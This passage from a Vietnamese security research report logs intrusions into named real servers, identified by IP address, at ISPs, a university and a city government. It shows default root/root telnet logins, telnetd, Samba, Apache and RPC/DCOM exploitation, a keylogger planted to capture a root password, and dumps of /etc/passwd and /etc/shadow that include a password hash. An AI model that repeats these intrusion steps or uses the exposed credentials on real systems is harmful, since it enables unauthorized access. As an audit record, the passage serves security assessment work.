ta có được quyền admin trên máy này. iii. IWM (10.2.105.21) 1. local hostname: IWM 2. Local IP: 10.2.105.21 3. Hệ điều hành: Solaris 6 4. Lỗi remote: telnetd Từ máy oms2 dùng lệnh arp –a để tìm các máy lân cận, ta thấy có máy IWM, thử telnet với các user trên các máy đã xâm nhập được và các passwd đơn giản nhưng không thành công. Lấy file binary dùng để khai thác lỗi telnetd từ máy của ta vào máy hrl ( vì không biên dịch được trên các server này). Từ shell ta thực thi file này và chiếm được user bin trên máy IWM. 5. Lỗi local - Khai thác lỗi xlock giống như máy hrl nhưng không thành công. - Với quyền của user bin có thể xem được file /etc/passwd. Ta thấy trong máy này không có nhiều user, chỉ có user common là có thể tận dụng được, thử su từ bin sang common và dò password nhưng không thành công. - Thoát khỏi IWM và quay lại hrl, thực hiện lại file khai thác lỗi telnetd với user là common, thành công, ta có được shell với quyền của user common. Thử lệnh su ta được ngay quyền root mà không cần passwprd. 3) 203.162.53.52 ( Stelecom) a. Hệ điều hành: Solaris 7 b. Hostname: ho_eipa Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 15 c. Local IP: 10.1.120.11 - 10.1.110.21 d. Lỗi remote: Telnetd với password đơn giản Có thể telnet vào máy này bằng user root và password root. [root@bugsearch hao]# telnet 203.162.53.52 Trying 203.162.53.52... Connected to 203.162.53.52 (203.162.53.52). Escape character is '^]' SunOS 5.7 +====================================================+ +==== ====+ +==== WELCOME to Hochiminh eip_A ====+ +==== ====+ +====================================================+ login: root Password: Last login: Mon Sep 29 13:47:47 from hanoi_eipa Sun Microsystems Inc. SunOS 5.7 Generic October 1998 You have mail. ho_eipa# w 1:59pm up 77 day(s), 13:43, 8 users, load average: 0.04, 0.04, 0.04 User tty login@ idle JCPU PCPU what eip pts/0 10:14am 3:00 -csh eip pts/3 31Jul03 rmh -c 1 eip pts/2 7:59pm rmh -c 1 eip pts/4 8:02am rmh -c 1 eip pts/5 4:44am 8:43 1 1 vi AlarmMessage.2003-10-01 eip pts/6 8:39am 5:18 vi AlarmMessage.2003-09-30 eip pts/7 8:42am 5:04 vi AlarmMessage.2003-10-01 root pts/8 1:59pm w ho_eipa# e. Lỗi local Vì quyền root đã chiếm được nên không cần xét đến các lỗi local khác. Ta xem qua file /etc/passwd, có thể server này đã bị tạo user có quyền tương đương root ho_eipa# more /etc/passwd root:x:0:1:Super-User:/:/bin/csh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico cachep01:x:0:1:cachep01@yahoo.com:/:/bin/csh listen:x:37:4:Network Admin:/usr/net/nls: Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 16 nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: nomd:x:1000:1000:EIP User:/home/nomd:/bin/csh eip:x:1001:1000:EIP Admin:/home/eip:/bin/csh nms:x:2000:1000:NMS BunDang:/home/nms:/bin/csh same::0:1:Super-User:/:/bin/csh ----------------------------------------------------------------- user same có uid=0, gid=1 có quyền tương đương root. f. Các server lân cận bị khai thác Dùng lệnh arp –a trên server vừa vào được ta thấy kết quả sau: ho_eipa# arp -a Net to Media Table Device IP Address Mask Flags Phys Addr ------ -------------------- --------------- ----- --------------- hme0 10.1.120.1 255.255.255.255 00:00:0c:07:ac:78 hme0 ho_eipb 255.255.255.255 08:00:20:fa:6c:c6 hme1 ho_eipaa 255.255.255.255 SP 08:00:20:fa:47:da hme0 ho_eipa 255.255.255.255 SP 08:00:20:fa:47:da hme1 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00 hme0 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00 ho_eipa# Ta thấy có các host sau 10.1.120.1, ho_eipb, ho_eipaa (chính là ho_eipa vì cùng MAC address) thử telnet 10.1.120.1 ta thấy đây là Switch, ho_eipb là 1 máy Sun. i. ho_eipb 1. hệ điều hành: Solaris 7 2. hostname: ho_eipb 3. Remote exploit: password đơn giản, user root, password root ii. ha_eipa 1. hệ điều hành: Solaris 7 2. hostname: ha_eipa 3. Remote exploit: password đơn giản, user root, password root iii. ha_eipb 1. hệ điều hành: Solaris 7 2. hostname: ha_eipb 3. Remote exploit: password đơn giản, user root, password root iv. Smschoa 1. hệ điều hành: HP-UX 2. hostname: smschoa 3. Local IP: 10.1.80.12 4. Remote exploit: password đơn giản, user root, password root ho_eipa# telnet 10.1.80.12 Trying 10.1.80.12... Connected to 10.1.80.12. Escape character is '^]'. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 17 HP-UX smschoa B.11.00 U 9000/800 (tb) login: root Password: Please wait...checking for disk quotas (c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved. (c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of California (c)Copyright 1980, 1984, 1986 Novell, Inc. (c)Copyright 1986-1992 Sun Microsystems, Inc. (c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology (c)Copyright 1989-1993 The Open Software Foundation, Inc. (c)Copyright 1986 Digital Equipment Corp. (c)Copyright 1990 Motorola, Inc. (c)Copyright 1990, 1991, 1992 Cornell University (c)Copyright 1989-1991 The University of Maryland (c)Copyright 1988 Carnegie Mellon University (c)Copyright 1991-1997 Mentat, Inc. (c)Copyright 1996 Morning Star Technologies, Inc. (c)Copyright 1996 Progressive Systems, Inc. (c)Copyright 1997 Isogon Corporation RESTRICTED RIGHTS LEGEND Use, duplication, or disclosure by the U.S. Government is subject to restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013. Hewlett-Packard Company 3000 Hanover Street Palo Alto, CA 94304 U.S.A. Rights for non-DOD U.S. Government Departments and Agencies are as set forth in FAR 52.227-19(c)(1,2). You have mail. Value of TERM has been set to "vt100". WARNING: YOU ARE SUPERUSER !! smschoa:root> w 2:02pm up 49 days, 13:03, 1 user, load average: 4.32, 3.84, 5.02 User tty login@ idle JCPU PCPU what root pts/tb 2:02p v. Smschob 1. hệ điều hành: HP-UX 2. hostname: smschob 3. Local IP: 10.1.80.13 4. Remote exploit: password đơn giản, user root, password root smschoa:root> arp -a smschob (192.1.1.3) at 0:30:6e:1e:ed:2e ether Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 18 10.1.80.1 (10.1.80.1) at 0:0:c:7:ac:50 ether smschob (10.1.80.13) at 0:30:6e:1e:ed:5e ether smschoa:root> telnet 10.1.80.13 Trying... Connected to 10.1.80.13. Escape character is '^]'. Local flow control on Telnet TERMINAL-SPEED option ON HP-UX smschob B.11.00 U 9000/800 (ta) login: root Password: Please wait...checking for disk quotas (c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved. (c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of California (c)Copyright 1980, 1984, 1986 Novell, Inc. (c)Copyright 1986-1992 Sun Microsystems, Inc. (c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology (c)Copyright 1989-1993 The Open Software Foundation, Inc. (c)Copyright 1986 Digital Equipment Corp. (c)Copyright 1990 Motorola, Inc. (c)Copyright 1990, 1991, 1992 Cornell University (c)Copyright 1989-1991 The University of Maryland (c)Copyright 1988 Carnegie Mellon University (c)Copyright 1991-1997 Mentat, Inc. (c)Copyright 1996 Morning Star Technologies, Inc. (c)Copyright 1996 Progressive Systems, Inc. (c)Copyright 1997 Isogon Corporation RESTRICTED RIGHTS LEGEND Use, duplication, or disclosure by the U.S. Government is subject to restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013. Hewlett-Packard Company 3000 Hanover Street Palo Alto, CA 94304 U.S.A. Rights for non-DOD U.S. Government Departments and Agencies are as set forth in FAR 52.227-19(c)(1,2). You have mail. Value of TERM has been set to "vt100". WARNING: YOU ARE SUPERUSER !! smschob:root> w 2:24pm up 101 days, 2:30, 1 user, load average: 0.59, 0.37, 0.35 User tty login@ idle JCPU PCPU what root pts/ta 2:24pm w smschob:root> Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 19 4) 203.162.45.152 (FPT) a. Hệ điều hành: RedHat Linux 7.2 b. Lỗi remote: Apache + openssl Lỗi này đã được thông báo trên internet khá lâu, các web server chạy apache version dưới 1.3.27 và openssl có version cũ hơn 0.9.6. Exploit code cũng đã được public trên các site hacker, security. Khai thác thành công lỗi này ta có được shell dưới quyền user chạy apache qua port 80 ( thông thường là user apache ). Đối với server này ta chiếm được shell với quyền của user apache. Tiếp theo ta đưa chương trình khai thác lỗi local vào để chiếm quyền root. c. Lỗi local: ptrace Đa số các kernel Linux version nhỏ hơn 2.4.20 đều bị lỗi này, nếu kernel được biên dịch lại từ source thì không bị lỗi. 5) 203.162.42.67 ( sng.pwc.com.vn) a. Hệ điều hành: RedHat Linux 9.0 b. Local IP: 10.161.16.254 c. Lỗi remote: Samba exploit Lỗi remote Samba trên server này cho phép ta chiếm được shell với quyền root. Server này là gateway và proxy server, có 02 card mạng Copy màn hình thực hiện và file /etc/passwd, /etc/shadow 6) 203.162.35.75 (mail.ittivietnam.com) a. Hệ điều hành: RedHat Linux 7.1 b. Lỗi remote: Samba, apache+ssl Server này bị xâm nhập thành công qua lỗi apache (version 1.3.23). Chiếm được remote shell dưới quyền user apache. c. Lỗi local: ptrace d. Các backdoor do hacker khác để lại Khi xâm nhập vào hệ thống, và chiếm quyền root, một số backdoor do các hacker xâm nhập vào đã được tìm thấy, các file quan trọng trên hệ thống như ls, netstat, ifconfig đều đã bị thay thế. Trong các lần thâm nhập vào, ta có thể phát hiện ra việc các hacker dùng server này để scan và làm bàn đạp tấn công các server khác: Dùng lệnh ps có thể phát hiện ra các proccess dùng để scan này. bash-2.05a# ps ax|more PID TTY STAT TIME COMMAND 1 ? S 0:06 init 2 ? SW 0:00 [keventd] 3 ? SWN 0:00 [ksoftirqd_CPU0] 4 ? SW 0:00 [kswapd] 5 ? SW 0:00 [bdflush] 6 ? SW 0:00 [kupdated] 7 ? SW 0:00 [mdrecoveryd] 15 ? SW 0:16 [kjournald] 99 ? SW 0:00 [khubd] Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 20 227 ? SW 0:00 [kjournald] 228 ? SW 0:01 [kjournald] 229 ? SW 0:00 [kjournald] 727 ? S 0:08 syslogd -m 0 732 ? S 0:01 klogd -x 1274 ? S 0:00 CROND 1275 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 1288 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 1289 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 1290 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 1291 ? Z 0:00 [awk ] 1300 ? T 0:00 /bin/hostname 1301 ? Z 0:00 [hostname ] 1388 ? S 0:00 /usr/sbin/sshd 1421 ? S 0:03 xinetd -stayalive -reuse -pidfile /var/run/xinetd.pid 1462 ? S 0:00 sendmail: accepting connections 1481 ? S 0:00 gpm -t ps/2 -m /dev/mouse 1504 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY - DHAVE_AUTH_ 1530 ? S 0:00 crond 1663 ? S 0:00 rhnsd --interval 120 1670 2 S 0:00 /sbin/mingetty tty2 1671 3 S 0:00 /sbin/mingetty tty3 1672 4 S 0:00 /sbin/mingetty tty4 1673 5 S 0:00 /sbin/mingetty tty5 1674 6 S 0:00 /sbin/mingetty tty6 1850 ? S 0:00 CROND 1851 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 1864 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 1865 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 1866 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 1867 ? Z 0:00 [awk ] 1873 ? T 0:00 /bin/hostname 1874 ? Z 0:00 [hostname ] 2617 ? T 0:00 ./ssvuln 210.185.ssl 210.185.ssl.out 35 2625 ? Z 0:00 [ssvuln ] 2666 ? T 0:00 ./ssvuln 210.186.ssl 210.186.ssl.out 35 2678 ? Z 0:00 [ssvuln ] 2866 ? S 0:00 /usr/sbin/sshd 2873 ? S 0:00 -bash 2924 ? S 0:00 ls --color=tty 2938 ? S 0:00 /bin/sh ./assl 210.188 2939 ? R 1:47 ./pscan2 210.188 443 2940 ? T 0:00 ./pscan2 210.188 443 2941 ? Z 0:00 [pscan2 ] 2947 ? S 0:00 sendmail: server msr91.hinet.net [168.95.4.191] child w 2948 ? S 0:00 sendmail: ./h7M0pMI02948 msr91.hinet.net [168.95.4.191] 2954 ? S 0:00 sendmail: server [203.162.23.26] child wait Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 21 2957 ? S 0:00 sendmail: server [203.162.23.26] cmd read 2958 ? R 0:00 ps ax 2959 ? R 0:00 -bash 7581 1 S 0:00 /sbin/mingetty tty1 30246 ? S 0:00 -bash 30419 ? T 0:00 ./ssvuln 215.30.ssl 215.30.ssl.out 35 30423 ? Z 0:00 [ssvuln ] 30424 ? T 0:00 ./oops 215.30.ssl.out 30426 ? Z 0:00 [oops ] 30647 ? S 0:00 CROND 30648 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 30659 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 30660 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 30661 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 30662 ? Z 0:00 [awk ] 30685 ? T 0:00 /bin/hostname 30686 ? Z 0:00 [hostname ] 31703 ? S 0:00 CROND 31704 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 31717 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 31718 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 31719 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 31720 ? Z 0:00 [awk ] 31729 ? T 0:00 /bin/hostname 31730 ? Z 0:00 [hostname ] 32385 ? S 0:00 CROND 32386 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 32399 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 32400 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 32401 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 32402 ? Z 0:00 [awk ] 32423 ? T 0:00 /bin/hostname 32424 ? Z 0:00 [hostname ] 32425 ? S 0:00 CROND 32426 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.daily 32589 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem root 32615 ? S 0:00 awk -v progname=/etc/cron.daily/makewhatis.cron prognam 32617 ? Z 0:00 [awk ] 32743 ? T 0:00 /usr/bin/awk 32748 ? Z 0:00 [awk ] 1643 ? S 0:00 /usr/sbin/atd 1363 ? S 0:00 named -u named 1365 ? S 0:00 named -u named 1366 ? S 0:00 named -u named 1367 ? S 0:00 named -u named 1368 ? S 0:00 named -u named Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 22 780 ? S 0:00 rpc.statd 752 ? S 0:00 portmap 1584 ? S 0:00 xfs -droppriv -daemon 1508 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY – (bỏ bớt một số dòng tiếp theo) bash-2.05a# 7) 203.162.33.35-router (Đại học sư phạm Tp HCM) a. version IOS dhsp#show version Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-I-M), Version 12.1(16), RELEASE SOFTWARE (fc1) Copyright (c) 1986-2002 by cisco Systems, Inc. Compiled Tue 09-Jul-02 02:33 by kellythw Image text-base: 0x80008088, data-base: 0x8082C938 ROM: System Bootstrap, Version 12.2(7r) [cmong 7r], RELEASE SOFTWARE (fc1) dhsp uptime is 1 week, 4 days, 9 hours, 28 minutes System returned to ROM by power-on System image file is "flash:c2600-i-mz.121-16.bin" cisco 2620XM (MPC860) processor (revision 0x100) with 53248K/12288K bytes of memory. Processor board ID JAD07070YJF (2656094087) M860 processor: part number 5, mask 2 Bridging software. X.25 software, Version 3.0.0. 1 FastEthernet/IEEE 802.3 interface(s) 10 Low-speed serial(sync/async) network interface(s) 32K bytes of non-volatile configuration memory. 16384K bytes of processor board System flash (Read/Write) Configuration register is 0x2102 b. lỗi bảo mật Lỗi cơ bản nhất đó là không đặt password telnet, khi telnet vào router ta được ngay …. [root@bugsearch /]# telnet 203.162.35.33 Trying 203.162.35.33... Connected to 203.162.35.33 (203.162.35.33). Escape character is '^]'. dhsp> 4.4 Bước tiếp theo, thử enable, password được hỏi, sau vài lần thử, ta thành công với một password đơn giản. [root@bugsearch /]# telnet 203.162.35.33 Trying 203.162.35.33... Connected to 203.162.35.33 (203.162.35.33). Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 23 Escape character is '^]'. dhsp> dhsp> dhsp> dhsp>en Password: Password: dhsp# Với quyền này ta hoàn toàn có khả năng sửa đổi được cấu hình router, tuy nhiên vì đây chưa phải là mục đích cuối cùng nên ta cần khai thác router để tìm cách tấn công vào web server. 8) 203.162.17.97 (hot.vnn.vn) Đây là server webhosting của vasc, có khá nhiều trang web được hosting trên server này, kể cả www.bkav.com.vn (có thể tham khảo file httpd.conf). a. Hệ điều hành: Solaris 7 b. Lỗi remote: Telnetd, bị khai thác và lấy remote shell dưới quyền user bin. c. Lỗi local: priocntl Tương tự như server suntest.vnnic.net, lỗi này cũng được khai thác thành công trên server này. 9) 203.162.4.30 (VDC2) a. Hệ điều hành: Solaris 7 b. Lỗi remote: telnetd c. Lỗi local: printioctl 10) 203.162.0.41 ( radius.vnn.vn) a. Hệ điều hành: Solaris 7 b. Lỗi remote: telnetd c. Lỗi local: priocntl 11) 203.144.70.17 ( cambodia) a. Hệ điều hành: Linux Suse b. Lỗi remote: Samba c. Lỗi local: ptrace 12) 203.162.17.142 a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM date Tue Jul 29 02:04:53 ICT 2003 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>mkdir bg mkdir bg Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 24 C:\WINNT\system32>dir dir Volume in drive C is VIB Volume Serial Number is 381C-0A3F Directory of C:\WINNT\system32 07/29/2003 01:08a . 07/29/2003 01:08a .. 12/03/2002 04:16p 1,070 $winnt$.inf 06/27/2001 01:47p 2,151 12520437.cpx 06/27/2001 01:47p 2,233 12520850.cpx 06/10/1999 02:50p 437,528 401COMUPD.EXE 12/07/1999 12:00p 32,016 aaaamon.dll 12/07/1999 12:00p 67,344 access.cpl 08/29/2002 07:06a 64,512 acctres.dll 12/07/1999 12:00p 150,800 accwiz.exe 12/07/1999 12:00p 61,952 acelpdec.ax 12/07/1999 12:00p 131,856 acledit.dll 07/22/2002 12:05p 78,096 aclui.dll 12/07/1999 12:00p 4,368 acsetupc.dll 12/07/1999 12:00p 17,168 acsetups.exe 13) 203.162.17.142 a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM date Fri Aug 29 15:23:53 ICT 2003 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32>mkdir bg mkdir bg C:\WINNT\system32>cd d: cd d: D:\ C:\WINNT\system32>d: d: The device is not ready. C:\WINNT\system32>e: e: The system cannot find the drive specified. C:\WINNT\system32>dir c:\ dir c:\ Volume in drive C has no label. Volume Serial Number is 5057-5682 Directory of c:\ 11/07/2002 06:35p 2,975 1 Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 25 11/07/2002 06:21p 0 a 11/06/2002 11:58a Documents and Settings 11/06/2002 11:39a Inetpub 04/08/2003 08:18a 13,030 PDOXUSRS.NET 02/28/2003 03:23p 3,072,573 pi_winproxy.exe 02/28/2003 03:24p Program Files 01/15/2003 08:32a SOFT 11/06/2002 04:39p virus 02/27/2003 01:55p WINNT 11/06/2002 05:03p 1,958 WinProxy.cfg 5 File(s) 3,090,536 bytes 6 Dir(s) 5,906,014,208 bytes free C:\WINNT\system32> 14) 203.162.5.126 a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM date 072823552003 Mon Jul 28 23:55:00 ICT 2003 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. D:\WINNT\system32>mkdir bg mkdir bg A subdirectory or file bg already exists. D:\WINNT\system32>c: c: C:\>dir dir Volume in drive C has no label. Volume Serial Number is 947B-CC93 Directory of C:\ 07/29/2003 02:05p 111 07/02/2003 04:46p 3797132a906c136b43bf566cd6582ae3 06/18/2003 05:05p AMERIC 07/10/2003 11:50a AuditNTPass 07/30/2003 08:12p CISCO 04/23/2003 06:01p 6,694 CLDMA.LOG 11/21/2002 10:01a Container 11/03/2002 02:09p demo_CCNA 06/28/2003 03:41p Download 15) 203.162.6.115 - www.cp.com.vn a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM Tue Jul 29 01:20:01 ICT 2003 Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 26 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>mkdir bg mkdir bg C:\WINNT\system32>nslookup nslookup Default Server: hcmc.saigonnet.vn Address: 203.162.6.97 C:\WINNT\system32>ipconfig /all ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : cpvietnam Primary DNS Suffix . . . . . . . : cpvietnam Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : cpvietnam www.cp.com.vn Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : www.cp.com.vn Description . . . . . . . . . . . : Compaq NC7760 Gigabit Server Adapter Physical Address. . . . . . . . . : 00-08-02-EF-D2-98 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 203.162.6.115 Subnet Mask . . . . . . . . . . . : 255.255.255.224 Default Gateway . . . . . . . . . : 203.162.6.100 DNS Servers . . . . . . . . . . . : 203.162.6.97 203.162.0.11 Primary WINS Server . . . . . . . : 199.1.1.31 C:\WINNT\system32>dir c: dir c: Volume in drive C has no label. Volume Serial Number is FC0D-D2A5 Directory of C:\WINNT\system32 07/29/2003 12:16a . 07/29/2003 12:16a .. 08/19/2002 07:54a 304 $winnt$.inf 03/29/2002 03:32p 2,151 12520437.cpx 03/29/2002 03:32p 2,233 12520850.cpx 16) 203.162.7.81 a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 27 date Fri Aug 1 16:24:34 ICT 2003 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>mkdir bg mkdir bg C:\WINNT\system32>ipconfig /all ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : rep1 Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : Yes WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82546EB Based Dual Port Network Connection #2 Physical Address. . . . . . . . . : 00-07-E9-04-E3-B8 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 203.162.7.81 Subnet Mask . . . . . . . . . . . : 255.255.255.224 Default Gateway . . . . . . . . . : 203.162.7.67 DNS Servers . . . . . . . . . . . : Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82546EB Based Dual Port Network Connection Physical Address. . . . . . . . . : 00-07-E9-04-E3-B9 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 203.160.0.12 Subnet Mask . . . . . . . . . . . : 255.255.255.0 IP Address. . . . . . . . . . . . : 192.168.49.1 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : 203.162.7.80 PPP adapter RAS Server (Dial In) Interface: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface Physical Address. . . . . . . . . : 00-53-45-00-00-00 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.50.1 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 28 PPP adapter {3671431D-5E69-4B81-A8E3-B397BD3D5581}: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface Physical Address. . . . . . . . . : 00-53-45-00-00-00 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 10.0.0.17 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : 17. Máy chủ ITPMO.hochiminhcity.gov.vn (203.162.97.125) và các máy chủ liên qua. Đây là các server được admin upgrade khá thường xuyên. Qua khảo sát, chúng tôi thấy không thể dùng exploit trực tiếp trên các lỗi của OS. Nhóm nghiên cứu đã phải có phương thức khác với những phương thức đã tiến hành với các máy chủ khác để xâm nhập. Cũng xin lưu ý là việc xâm nhập thành công vào ITPMO cũng nhờ thêm vào sự quen biết mang tính chất xã hội của nhóm nghiên cứu với admin của máy chủ này. Nhóm nghiên cứu tập trung đầu tiên vào điểm yếu nhất của hệ thống: Khoa Toán trường KHTN. Đầu tiên xâm nhập được máy chủ của thư viện KHTN „ Khai thác thành công lỗi Samba, chiếm được root shell. „ Cài key-logger theo kiểu load kernel module „ Có thể lấy được password login từ console hoặc remote „ Kết quả: lấy được passwd của user root Sau đó xâm nhập sang máy chủ portal.math.hcmuns.edu.vn, mathdep.hcmuns.edu.vn qua các lỗi tương tự. Sau đó, xâm nhập qua đích cuối cùng là itpmo vì máy này có cùng cơ sở dữ liệu người sử dụng với máy trên !!! [vdchai@itpmo vdchai]$ [vdchai@itpmo vdchai]$ su Password: [root@itpmo vdchai]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 29 User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/home/httpd:/sbin/nologin webalizer:x:67:67:Webalizer:/home/httpd/html/usage:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash iportal:x:100:48:iPortal:/home/iportal:/bin/bash [root@itpmo vdchai]# cat /etc/shadow root:$1$eidlISUT$RGprKeXY9JX7VUaaumUxA/:12347:0:99999:7::: bin:*:12347:0:99999:7::: daemon:*:12347:0:99999:7::: adm:*:12347:0:99999:7::: lp:*:12347:0:99999:7::: sync:*:12347:0:99999:7::: shutdown:*:12347:0:99999:7::: halt:*:12347:0:99999:7::: mail:*:12347:0:99999:7::: uucp:*:12347:0:99999:7::: operator:*:12347:0:99999:7::: ftp:*:12347:0:99999:7::: nobody:*:12347:0:99999:7::: rpm:!!:12347:0:99999:7::: vcsa:!!:12347:0:99999:7::: nscd:!!:12347:0:99999:7::: sshd:!!:12347:0:99999:7::: rpc:!!:12347:0:99999:7::: 